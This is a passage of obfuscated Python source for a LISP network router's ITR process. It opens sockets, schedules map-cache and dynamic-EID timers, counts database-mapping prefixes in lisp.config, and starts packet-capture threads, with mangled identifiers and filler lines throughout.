if 3 - 3: i1IIi / I1IiiI % I11i * i11iIiiIii / O0 * I11i
if 49 - 49: oO0o % Ii1I + i1IIi . I1IiiI % I1ii11iIi11i
def I1i1iii ( parameter ) :
return ( lispconfig . lisp_itr_rtr_show_rloc_probe_command ( "ITR" ) )
if 20 - 20: o0oOOo0O0Ooo
if 77 - 77: OoOoOO00 / I11i
if 98 - 98: iIii1I11I1II1 / i1IIi / i11iIiiIii / o0oOOo0O0Ooo
if 28 - 28: OOooOOo - IiII . IiII + OoOoOO00 - OoooooooOO + O0
if 95 - 95: OoO0O00 % oO0o . O0
if 15 - 15: ooOoO0o / Ii1I . Ii1I - i1IIi
if 53 - 53: IiII + I1IiiI * oO0o
if 61 - 61: i1IIi * OOooOOo / OoooooooOO . i11iIiiIii . OoOoOO00
if 60 - 60: I11i / I11i
if 46 - 46: Ii1I * OOooOOo - OoO0O00 * oO0o - I1Ii111
def oo0 ( lisp_sockets , lisp_ephem_port ) :
lisp . lisp_set_exception ( )
if 57 - 57: OOooOOo . OOooOOo
if 95 - 95: O0 + OoO0O00 . II111iiii / O0
if 97 - 97: ooOoO0o - OOooOOo * i11iIiiIii / OoOoOO00 % I1Ii111 - OoooooooOO
if 59 - 59: O0 + I1IiiI + IiII % I1IiiI
for o0OOoo0OO0OOO in lisp . lisp_crypto_keys_by_nonce . values ( ) :
for iI1iI1I1i1I in o0OOoo0OO0OOO : del ( iI1iI1I1i1I )
if 24 - 24: I1ii11iIi11i
lisp . lisp_crypto_keys_by_nonce = { }
if 56 - 56: ooOoO0o
if 92 - 92: iII111i . I11i + o0oOOo0O0Ooo
if 28 - 28: i1IIi * Oo0Ooo - o0oOOo0O0Ooo * IiII * Ii1I / OoO0O00
if 94 - 94: II111iiii % I1ii11iIi11i / OoOoOO00 * iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo - I1IiiI + OoooooooOO
if ( lisp . lisp_l2_overlay ) :
O0o0 = lisp . LISP_AFI_MAC
OO00Oo = lisp . lisp_default_iid
O0OOO0OOoO0O = lisp . lisp_address ( O0o0 , "0000-0000-0000" , 0 , OO00Oo )
O0OOO0OOoO0O . mask_len = 0
O00Oo000ooO0 = lisp . lisp_address ( O0o0 , "ffff-ffff-ffff" , 48 , OO00Oo )
lisp . lisp_send_map_request ( lisp_sockets , lisp_ephem_port , O0OOO0OOoO0O , O00Oo000ooO0 , None )
if 100 - 100: O0 + IiII - OOooOOo + i11iIiiIii * Ii1I
if 30 - 30: o0oOOo0O0Ooo . Ii1I - OoooooooOO
if 8 - 8: i1IIi - iIii1I11I1II1 * II111iiii + i11iIiiIii / I1Ii111 % OOooOOo
if 16 - 16: I1ii11iIi11i + OoO0O00 - II111iiii
if 85 - 85: OoOoOO00 + i1IIi
lisp . lisp_timeout_map_cache ( lisp . lisp_map_cache )
if 58 - 58: II111iiii * OOooOOo * I1ii11iIi11i / OOooOOo
if 75 - 75: oO0o
if 50 - 50: Ii1I / Oo0Ooo - oO0o - I11i % iII111i - oO0o
if 91 - 91: OoO0O00 / I11i - II111iiii . I11i
i11 = threading . Timer ( 60 , oo0 ,
[ lisp_sockets , lisp_ephem_port ] )
i11 . start ( )
return
if 18 - 18: o0oOOo0O0Ooo
if 98 - 98: iII111i * iII111i / iII111i + I11i
if 34 - 34: ooOoO0o
if 15 - 15: I11i * ooOoO0o * Oo0Ooo % i11iIiiIii % OoOoOO00 - OOooOOo
if 68 - 68: I1Ii111 % i1IIi . IiII . I1ii11iIi11i
if 92 - 92: iII111i . I1Ii111
if 31 - 31: I1Ii111 . OoOoOO00 / O0
if 89 - 89: OoOoOO00
def OO0oOoOO0oOO0 ( lisp_socket ) :
lisp . lisp_set_exception ( )
if 86 - 86: OOooOOo
OOoo0O = lisp . lisp_get_timestamp ( )
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . dynamic_eid_configured ( ) == False ) : continue
if 22 - 22: iIii1I11I1II1 / i11iIiiIii * iIii1I11I1II1 * II111iiii . OOooOOo / i11iIiiIii
Iiii = [ ]
for OO0OoO0o00 in Oo0ooOo0o . dynamic_eids . values ( ) :
ooOO0O0ooOooO = OO0OoO0o00 . last_packet
if ( ooOO0O0ooOooO == None ) : continue
if ( ooOO0O0ooOooO + OO0OoO0o00 . timeout > OOoo0O ) : continue
if 55 - 55: o0oOOo0O0Ooo * OoOoOO00
if 61 - 61: I11i
if 86 - 86: I11i % OoOoOO00 / I1IiiI / OoOoOO00
if 42 - 42: OoO0O00
if 67 - 67: I1Ii111 . iII111i . O0
if ( lisp . lisp_program_hardware ) :
IIIIiiII111 = OO0OoO0o00 . dynamic_eid . print_prefix_no_iid ( )
if ( lisp . lisp_arista_is_alive ( IIIIiiII111 ) ) :
lisp . lprint ( ( "Hardware indicates dynamic-EID {} " + "still active" ) . format ( lisp . green ( IIIIiiII111 , False ) ) )
if 97 - 97: I1ii11iIi11i + OOooOOo / iIii1I11I1II1 / iII111i
continue
if 37 - 37: iII111i - ooOoO0o * oO0o % i11iIiiIii - I1Ii111
if 83 - 83: I11i / I1IiiI
if 34 - 34: IiII
if 57 - 57: oO0o . I11i . i1IIi
if 42 - 42: I11i + I1ii11iIi11i % O0
if 6 - 6: oO0o
oOOo0oOo0 = OO0OoO0o00 . dynamic_eid . print_address ( )
II = "learn%{}%None" . format ( oOOo0oOo0 )
II = lisp . lisp_command_ipc ( II , "lisp-itr" )
lisp . lisp_ipc ( II , lisp_socket , "lisp-etr" )
if 60 - 60: I1IiiI
lisp . lprint ( "Dynamic-EID {}" . format ( lisp . bold ( lisp . green ( oOOo0oOo0 , False ) + " activity timeout" ,
# II111iiii . I1IiiI
False ) ) )
Iiii . append ( oOOo0oOo0 )
if 1 - 1: Oo0Ooo / o0oOOo0O0Ooo % iII111i * IiII . i11iIiiIii
if 2 - 2: I1ii11iIi11i * I11i - iIii1I11I1II1 + I1IiiI . oO0o % iII111i
if 92 - 92: iII111i
if 25 - 25: Oo0Ooo - I1IiiI / OoooooooOO / o0oOOo0O0Ooo
if 12 - 12: I1IiiI * iII111i % i1IIi % iIii1I11I1II1
for oOOo0oOo0 in Iiii : Oo0ooOo0o . dynamic_eids . pop ( oOOo0oOo0 )
if 20 - 20: OOooOOo % Ii1I / Ii1I + Ii1I
if 45 - 45: oO0o - IiII - OoooooooOO - OoO0O00 . II111iiii / O0
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ lisp_socket ] ) . start ( )
return
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
if 77 - 77: iIii1I11I1II1 * OoO0O00
def oOooOo0 ( ) :
if ( lisp . lisp_is_macos ( ) ) : return ( [ "en0" , "en1" , "lo0" ] )
if 38 - 38: I1Ii111
if 84 - 84: iIii1I11I1II1 % iII111i / iIii1I11I1II1 % I11i
if 45 - 45: O0
if 26 - 26: I11i - iIii1I11I1II1 - I1IiiI / OoO0O00 . OoOoOO00 % iIii1I11I1II1
OO = "Link encap"
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if ( iIiIIi1 == "" ) :
OO = ": flags="
iIiIIi1 = commands . getoutput ( "ifconfig | egrep '{}'" . format ( OO ) )
if 7 - 7: ooOoO0o - Oo0Ooo - oO0o + ooOoO0o
if 26 - 26: Ii1I
iIiIIi1 = iIiIIi1 . split ( "\n" )
if 35 - 35: Ii1I - I1IiiI % o0oOOo0O0Ooo . OoooooooOO % Ii1I
I1i1Iiiii = [ ]
for OOo0oO00ooO00 in iIiIIi1 :
oOO0O00oO0Ooo = OOo0oO00ooO00 . split ( OO ) [ 0 ] . replace ( " " , "" )
I1i1Iiiii . append ( oOO0O00oO0Ooo )
if 67 - 67: OoO0O00 - OOooOOo
return ( I1i1Iiiii )
if 36 - 36: IiII
if 36 - 36: ooOoO0o / O0 * Oo0Ooo - OOooOOo % iIii1I11I1II1 * oO0o
if 79 - 79: O0
if 78 - 78: I1ii11iIi11i + OOooOOo - I1Ii111
if 38 - 38: o0oOOo0O0Ooo - oO0o + iIii1I11I1II1 / OoOoOO00 % Oo0Ooo
if 57 - 57: OoO0O00 / ooOoO0o
if 29 - 29: iIii1I11I1II1 + OoOoOO00 * OoO0O00 * OOooOOo . I1IiiI * I1IiiI
def I111I1Iiii1i ( ) :
global II1iII1i
global oO0oIIII
global Oo0oO0oo0oO00
global i111I
global II1Ii1iI1i
global Ii1IIii11 , Oooo0000
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
lisp . lisp_i_am ( "itr" )
lisp . lisp_set_exception ( )
lisp . lisp_print_banner ( "ITR starting up" )
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if 88 - 88: OoooooooOO - OoO0O00 * O0 * OoooooooOO . OoooooooOO
if 33 - 33: I1Ii111 + iII111i * oO0o / iIii1I11I1II1 - I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
lisp . lisp_get_local_interfaces ( )
lisp . lisp_get_local_macs ( )
if ( lisp . lisp_get_local_addresses ( ) == False ) : return ( False )
if 57 - 57: i11iIiiIii . I1ii11iIi11i - Ii1I - oO0o + OoOoOO00
if 63 - 63: OoOoOO00 * iII111i
if 69 - 69: O0 . OoO0O00
if 49 - 49: I1IiiI - I11i
II1iII1i [ 0 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV4 )
II1iII1i [ 1 ] = lisp . lisp_open_send_socket ( "" , lisp . LISP_AFI_IPV6 )
oO0oIIII = lisp . lisp_open_listen_socket ( "" , "lisp-itr" )
Oo0oO0oo0oO00 = lisp . lisp_open_listen_socket ( "" , "lispers.net-itr" )
II1iII1i [ 2 ] = oO0oIIII
OoOOoOooooOOo = "0.0.0.0" if lisp . lisp_is_raspbian ( ) else "0::0"
i111I = lisp . lisp_open_listen_socket ( OoOOoOooooOOo ,
str ( iiI1iIiI ) )
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
II1Ii1iI1i = lisp . lisp_open_listen_socket ( "0.0.0.0" ,
str ( OOo ) )
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
if 37 - 37: OoooooooOO - O0 - o0oOOo0O0Ooo
if 77 - 77: OOooOOo * iIii1I11I1II1
if 98 - 98: I1IiiI % Ii1I * OoooooooOO
Ii1IIii11 = socket . socket ( socket . AF_INET , socket . SOCK_RAW ,
socket . IPPROTO_RAW )
Ii1IIii11 . setsockopt ( socket . SOL_IP , socket . IP_HDRINCL , 1 )
if 51 - 51: iIii1I11I1II1 . OoOoOO00 / oO0o + o0oOOo0O0Ooo
if ( lisp . lisp_is_raspbian ( ) == False ) :
Oooo0000 = socket . socket ( socket . AF_INET6 , socket . SOCK_RAW ,
socket . IPPROTO_UDP )
if 33 - 33: ooOoO0o . II111iiii % iII111i + o0oOOo0O0Ooo
if 71 - 71: Oo0Ooo % OOooOOo
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
if 78 - 78: I1ii11iIi11i % oO0o / iII111i - iIii1I11I1II1
if 69 - 69: I1Ii111
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
lisp . lisp_ipc_socket = oO0oIIII
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
threading . Thread ( target = OoOOo0OOoO ) . start ( )
if 72 - 72: Ii1I
if 1 - 1: OoO0O00 * IiII * OoooooooOO + ooOoO0o
if 33 - 33: O0 * o0oOOo0O0Ooo - I1Ii111 % I1Ii111
if 18 - 18: I1Ii111 / Oo0Ooo * I1Ii111 + I1Ii111 * i11iIiiIii * I1ii11iIi11i
lisp . lisp_load_checkpoint ( )
if 11 - 11: ooOoO0o / OoOoOO00 - IiII * OoooooooOO + OoooooooOO . OoOoOO00
if 26 - 26: Ii1I % I1ii11iIi11i
if 76 - 76: IiII * iII111i
if 52 - 52: OOooOOo
lisp . lisp_load_split_pings = ( os . getenv ( "LISP_LOAD_SPLIT_PINGS" ) != None )
if 19 - 19: I1IiiI
if 25 - 25: Ii1I / ooOoO0o
if 31 - 31: OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
if 71 - 71: I1Ii111 . II111iiii
i11 = threading . Timer ( 60 , oo0 ,
[ II1iII1i , iiI1iIiI ] )
i11 . start ( )
if 62 - 62: OoooooooOO . I11i
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
threading . Timer ( lisp . LISP_DEFAULT_DYN_EID_TIMEOUT ,
OO0oOoOO0oOO0 , [ oO0oIIII ] ) . start ( )
return ( True )
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
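# Count the "prefix {" sub-clauses inside the "lisp database-mapping" clause
# of ./lisp.config, so startup knows how many EID-prefixes to wait for.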
def o0ooooO0o0O ( ) :
iiIi11iI1iii = open ( "./lisp.config" , "r" )
if 67 - 67: O0 / I1Ii111
OOO0000oO = False
iI1i111I1Ii = 0
for i11i1ii1I in iiIi11iI1iii :
if ( i11i1ii1I == "lisp database-mapping {\n" ) : OOO0000oO = True
if ( i11i1ii1I == "}\n" ) : OOO0000oO = False
if ( OOO0000oO == False ) : continue
if ( i11i1ii1I [ 0 ] == " " and i11i1ii1I . find ( "prefix {" ) != - 1 ) : iI1i111I1Ii += 1
if 88 - 88: I11i % I1ii11iIi11i
iiIi11iI1iii . close ( )
return ( iI1i111I1Ii )
if 48 - 48: ooOoO0o / I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / i1IIi
if 92 - 92: Oo0Ooo % Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
if 38 - 38: OOooOOo + II111iiii % ooOoO0o % OoOoOO00 - Ii1I / OoooooooOO
if 73 - 73: o0oOOo0O0Ooo * O0 - i11iIiiIii
if 85 - 85: Ii1I % iII111i + I11i / o0oOOo0O0Ooo . oO0o + OOooOOo
if 62 - 62: i11iIiiIii + i11iIiiIii - o0oOOo0O0Ooo
if 28 - 28: iII111i . iII111i % iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / iII111i
if 27 - 27: OoO0O00 + ooOoO0o - i1IIi
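# Wait (LISP_ITR_WAIT_TIME seconds per retry, default 1) until the number of
# processed database-mappings matches the count found in lisp.config, then
# return two lists: all IPv4/IPv6/MAC EID-prefixes and the subset configured
# as dynamic-EIDs.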
def O00oOOooo ( ) :
if 50 - 50: I1ii11iIi11i % O0 * o0oOOo0O0Ooo
if 5 - 5: IiII * OoOoOO00
if 5 - 5: I1Ii111
if 90 - 90: I1Ii111 . ooOoO0o / Ii1I - I11i
if 40 - 40: OoooooooOO
iI1i111I1Ii = o0ooooO0o0O ( )
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
if 84 - 84: ooOoO0o % Ii1I + i11iIiiIii
if 28 - 28: Oo0Ooo + OoO0O00 * OOooOOo % oO0o . I11i % O0
if 16 - 16: I11i - iIii1I11I1II1 / I1IiiI . II111iiii + iIii1I11I1II1
if 19 - 19: OoO0O00 - Oo0Ooo . O0
if 60 - 60: II111iiii + Oo0Ooo
I1IiIiiIiIII = os . getenv ( "LISP_ITR_WAIT_TIME" )
I1IiIiiIiIII = 1 if ( I1IiIiiIiIII == None ) else int ( I1IiIiiIiIII )
if 8 - 8: oO0o / I1ii11iIi11i
if 20 - 20: I1IiiI
if 95 - 95: iII111i - I1IiiI
if 34 - 34: ooOoO0o * I1IiiI . i1IIi * ooOoO0o / ooOoO0o
if 30 - 30: I1ii11iIi11i + Oo0Ooo / Oo0Ooo % I1ii11iIi11i . I1ii11iIi11i
while ( iI1i111I1Ii != len ( lisp . lisp_db_list ) ) :
lisp . lprint ( ( "Waiting {} second(s) for {} database-mapping EID-" + "prefixes, {} processed so far ..." ) . format ( I1IiIiiIiIII , iI1i111I1Ii ,
len ( lisp . lisp_db_list ) ) )
time . sleep ( I1IiIiiIiIII )
if 70 - 70: OoO0O00 % oO0o + OOooOOo / Ii1I % O0
if 100 - 100: o0oOOo0O0Ooo + OOooOOo * o0oOOo0O0Ooo
if 80 - 80: o0oOOo0O0Ooo * O0 - Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
oOoOO = [ ]
Ii1i1 = [ ]
for Oo0ooOo0o in lisp . lisp_db_list :
if ( Oo0ooOo0o . eid . is_ipv4 ( ) or Oo0ooOo0o . eid . is_ipv6 ( ) or Oo0ooOo0o . eid . is_mac ( ) ) :
oOOo0oOo0 = Oo0ooOo0o . eid . print_prefix_no_iid ( )
if ( Oo0ooOo0o . dynamic_eid_configured ( ) ) : Ii1i1 . append ( oOOo0oOo0 )
oOoOO . append ( oOOo0oOo0 )
if 65 - 65: ooOoO0o . OoooooooOO / I1ii11iIi11i . i1IIi * OoO0O00
if 19 - 19: i11iIiiIii + OoooooooOO - Oo0Ooo - I11i
return ( oOoOO , Ii1i1 )
if 21 - 21: O0 % IiII . I1IiiI / II111iiii + IiII
if 53 - 53: oO0o - I1IiiI - oO0o * iII111i
if 71 - 71: O0 - iIii1I11I1II1
if 12 - 12: OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
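# Packet-capture setup thread: build the pcap filter (control-plane-only when
# lisp_ipc_data_plane is set), install kernel filters on Linux for non-L2
# overlays, and start one capture thread per selected interface, plus
# RLOC-probe-only capture threads on the remaining RLOC interfaces.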
def OoOOo0OOoO ( ) :
global i1iIIi1
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
lisp . lisp_set_exception ( )
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
if 46 - 46: o0oOOo0O0Ooo % iIii1I11I1II1 . iII111i % iII111i + i11iIiiIii
if 72 - 72: iIii1I11I1II1 * Ii1I % ooOoO0o / OoO0O00
if 35 - 35: ooOoO0o + i1IIi % I1ii11iIi11i % I11i + oO0o
if 17 - 17: i1IIi
oOoOO , Ii1i1 = O00oOOooo ( )
if 21 - 21: Oo0Ooo
if 29 - 29: I11i / II111iiii / ooOoO0o * OOooOOo
if 10 - 10: I1Ii111 % IiII * IiII . I11i / Ii1I % OOooOOo
if 49 - 49: OoO0O00 / oO0o + O0 * o0oOOo0O0Ooo
if 28 - 28: ooOoO0o + i11iIiiIii / I11i % OoOoOO00 % Oo0Ooo - O0
if 54 - 54: i1IIi + II111iiii
if 83 - 83: I1ii11iIi11i - I1IiiI + OOooOOo
if 5 - 5: Ii1I
if 46 - 46: IiII
ii1iIi1iIiI1i = None
if ( lisp . lisp_ipc_data_plane ) :
lisp . lprint ( lisp . bold ( "Data-plane packet capture disabled" , False ) )
ii1iIi1iIiI1i = "(udp src port 4342 and ip[28] == 0x28)" + " or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
if 40 - 40: i1IIi % OOooOOo
if 71 - 71: OoOoOO00
lisp . lprint ( "Control-plane capture: '{}'" . format ( ii1iIi1iIiI1i ) )
else :
lisp . lprint ( "Capturing packets for source-EIDs {}" . format ( lisp . green ( str ( oOoOO ) , False ) ) )
if 14 - 14: i11iIiiIii % OOooOOo
if 82 - 82: iIii1I11I1II1 + Oo0Ooo . iIii1I11I1II1 % IiII / Ii1I . Ii1I
if ( lisp . lisp_pitr ) : lisp . lprint ( "Configured for PITR functionality" )
if 14 - 14: o0oOOo0O0Ooo . OOooOOo . I11i + OoooooooOO - OOooOOo + IiII
if 9 - 9: Ii1I
if 59 - 59: I1IiiI * II111iiii . O0
if 56 - 56: Ii1I - iII111i % I1IiiI - o0oOOo0O0Ooo
if 51 - 51: O0 / ooOoO0o * iIii1I11I1II1 + I1ii11iIi11i + o0oOOo0O0Ooo
if 98 - 98: iIii1I11I1II1 * I1ii11iIi11i * OOooOOo + ooOoO0o % i11iIiiIii % O0
i1 = lisp . lisp_l2_overlay
if ( i1 == False ) :
if ( lisp . lisp_is_linux ( ) ) : OO0oOOoo ( oOoOO , Ii1i1 )
if 52 - 52: o0oOOo0O0Ooo % Oo0Ooo
if 64 - 64: O0 % I11i % O0 * OoO0O00 . oO0o + I1IiiI
if 75 - 75: I11i . OoooooooOO % o0oOOo0O0Ooo * I11i % OoooooooOO
if 13 - 13: IiII / i11iIiiIii % II111iiii % I11i . I1ii11iIi11i
if 8 - 8: OoOoOO00 + Oo0Ooo - II111iiii
if 11 - 11: i1IIi % i11iIiiIii - i1IIi * OoOoOO00
if ( ii1iIi1iIiI1i == None ) :
if ( lisp . lisp_pitr ) :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , [ ] , False , True )
else :
i1I11IiI1iiII = o00oOo0oOoo ( oOoOO , Ii1i1 , i1 ,
False )
if 57 - 57: OoOoOO00 - I1ii11iIi11i
else :
i1I11IiI1iiII = ii1iIi1iIiI1i
if 50 - 50: I1Ii111 / i1IIi % OoO0O00 . I1IiiI / iII111i
if 88 - 88: OOooOOo . I11i * o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . I11i
if 10 - 10: o0oOOo0O0Ooo * Oo0Ooo % O0 * iIii1I11I1II1 . O0 % I1ii11iIi11i
if 44 - 44: II111iiii / iII111i / I11i % II111iiii / i1IIi . Ii1I
if 59 - 59: OoooooooOO
iIiIIi1 = oOooOo0 ( )
i1iiiii1 = os . getenv ( "LISP_PCAP_LIST" )
if ( i1iiiii1 == None ) :
O0iII1 = ""
IIII1i = [ ]
else :
Ii1IIIIi1ii1I = list ( set ( i1iiiii1 . split ( ) ) & set ( iIiIIi1 ) )
IIII1i = list ( set ( i1iiiii1 . split ( ) ) ^ set ( iIiIIi1 ) )
O0iII1 = "user-selected "
lisp . lprint ( "User pcap-list: {}, active-interfaces: {}" . format ( i1iiiii1 , iIiIIi1 ) )
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
iIiIIi1 = Ii1IIIIi1ii1I
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
if 100 - 100: ooOoO0o % iIii1I11I1II1 * II111iiii - iII111i
if 92 - 92: ooOoO0o
II11iI111i1 = ( i1I11IiI1iiII . find ( "ether host" ) != - 1 )
for Oo00OoOo in iIiIIi1 :
if ( Oo00OoOo in [ "lo" , "lispers.net" ] and II11iI111i1 ) :
lisp . lprint ( ( "Capturing suppressed on interface {}, " + "MAC filters configured" ) . format ( Oo00OoOo ) )
if 24 - 24: i11iIiiIii - I1Ii111
continue
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
ii1 = [ Oo00OoOo , i1I11IiI1iiII , i1iIIi1 ]
lisp . lprint ( "Capturing packets on {}interface {}" . format ( O0iII1 , Oo00OoOo ) )
threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
if 31 - 31: I11i . I1Ii111 * ooOoO0o + i11iIiiIii * oO0o
if ( ii1iIi1iIiI1i ) : return
if 93 - 93: I1ii11iIi11i / iIii1I11I1II1 * i1IIi % OoooooooOO * O0 * I11i
if 64 - 64: II111iiii + O0 / iIii1I11I1II1 / Oo0Ooo . ooOoO0o % IiII
if 50 - 50: iIii1I11I1II1 - IiII + OOooOOo
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
iI1iIIIi1i = "(udp src port 4342 and ip[28] == 0x28)"
for Oo00OoOo in IIII1i :
ii1 = [ Oo00OoOo , iI1iIIIi1i , i1iIIi1 ]
lisp . lprint ( "Capture RLOC-probe replies on RLOC interface {}" . format ( Oo00OoOo ) )
if 89 - 89: iIii1I11I1II1
threading . Thread ( target = Oo0000oOo , args = ii1 ) . start ( )
if 21 - 21: I11i % I11i
return
if 27 - 27: i11iIiiIii / I1ii11iIi11i
if 84 - 84: Oo0Ooo
if 43 - 43: oO0o - OoooooooOO
if 3 - 3: O0 / iII111i
if 31 - 31: OOooOOo + o0oOOo0O0Ooo . OoooooooOO
if 89 - 89: II111iiii + i1IIi + II111iiii
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
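# Shutdown helper: cancel the periodic Info-Request timer and close all of
# the ITR's send, listen, and IPC sockets.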
def II1Ii11I111I ( ) :
if 13 - 13: ooOoO0o / iII111i * OoO0O00 . OoO0O00 * ooOoO0o
if 63 - 63: I1Ii111 / O0 * Oo0Ooo + II111iiii / IiII + Ii1I
if 63 - 63: OoO0O00 + I1ii11iIi11i . I1Ii111 % I1Ii111
if 57 - 57: II111iiii
if ( I11 ) : I11 . cancel ( )
if 54 - 54: Oo0Ooo + oO0o + i11iIiiIii
if 28 - 28: oO0o
if 70 - 70: IiII
if 34 - 34: I1Ii111 % IiII
lisp . lisp_close_socket ( II1iII1i [ 0 ] , "" )
lisp . lisp_close_socket ( II1iII1i [ 1 ] , "" )
lisp . lisp_close_socket ( i111I , "" )
lisp . lisp_close_socket ( II1Ii1iI1i , "" )
lisp . lisp_close_socket ( oO0oIIII , "lisp-itr" )
lisp . lisp_close_socket ( Oo0oO0oo0oO00 , "lispers.net-itr" )
return
if 3 - 3: II111iiii / OOooOOo + IiII . ooOoO0o . OoO0O00
if 83 - 83: oO0o + OoooooooOO
if 22 - 22: Ii1I % iII111i * OoooooooOO - o0oOOo0O0Ooo / iIii1I11I1II1
if 86 - 86: OoooooooOO . iII111i % OoOoOO00 / I11i * iII111i / o0oOOo0O0Ooo
if 64 - 64: i11iIiiIii
if 38 - 38: IiII / I1IiiI - IiII . I11i
if 69 - 69: OoooooooOO + I1ii11iIi11i
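# Data-plane packet handler: hand RLOC-probe replies to the control plane,
# decode the captured packet, verify the source is a configured EID (doing
# dynamic-EID discovery when allowed), look up the destination in the
# map-cache (sending a rate-limited Map-Request on a miss or TTL refresh),
# then natively forward, encapsulate to the selected RLOC, or replicate
# across an RLE.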
def O0oOo00o0 ( packet , device , input_interface , macs , my_sa ) :
global II1iII1i
global iiI1iIiI
global Ii1IIii11 , Oooo0000
global oO0oIIII
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
if 38 - 38: OoOoOO00 / iII111i % Oo0Ooo
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
O0O0oOOo0O = packet
packet , II11 , O00oooo00o0O , ii1iii1I1I = lisp . lisp_is_rloc_probe ( packet , 1 )
if ( O0O0oOOo0O != packet ) :
if ( II11 == None ) : return
lisp . lisp_parse_packet ( II1iII1i , packet , II11 , O00oooo00o0O , ii1iii1I1I )
return
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
packet = lisp . lisp_packet ( packet )
if ( packet . decode ( False , None , None ) == None ) : return
if 72 - 72: oO0o + oO0o / II111iiii . OoooooooOO % Ii1I
if 49 - 49: oO0o . OoO0O00 - Oo0Ooo * OoooooooOO . Oo0Ooo
if 2 - 2: OoooooooOO % OOooOOo
if 63 - 63: I1IiiI % iIii1I11I1II1
if 39 - 39: iII111i / II111iiii / I1ii11iIi11i % I1IiiI
